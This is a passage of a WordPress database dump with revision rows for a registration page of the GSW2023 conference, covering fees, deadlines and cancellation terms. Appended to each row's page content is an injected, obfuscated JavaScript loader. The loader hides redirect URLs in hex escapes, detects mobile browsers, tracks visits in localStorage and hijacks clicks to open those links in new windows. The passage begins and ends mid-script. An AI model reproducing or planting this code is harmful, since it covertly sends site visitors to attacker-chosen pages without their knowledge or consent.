_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 08:19:33','2023-02-05 08:19:33','',2638,'https://gsw2023.com/?p=3776',0,'revision','',0),
(3777,1,'2023-02-05 08:20:32','2023-02-05 08:20:32','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 12pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: \'Andale Mono\', Times;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<strong><span style=\"font-size: 14pt; color: black; font-family: \'Andale Mono\', Times;\">Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</span></strong></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\n<li><strong>Two social dinners will be organized on Tuesday and Thursday.</strong></li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 08:20:32','2023-02-05 08:20:32','',2638,'https://gsw2023.com/?p=3777',0,'revision','',0),
(3778,1,'2023-02-05 08:21:39','2023-02-05 08:21:39','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: \'Andale Mono\', Times;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<strong><span style=\"font-size: 14pt; color: black; font-family: \'Andale Mono\', Times;\">Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</span></strong></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\n<li><strong>Two social dinners will be organized on Tuesday and Thursday.</strong></li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 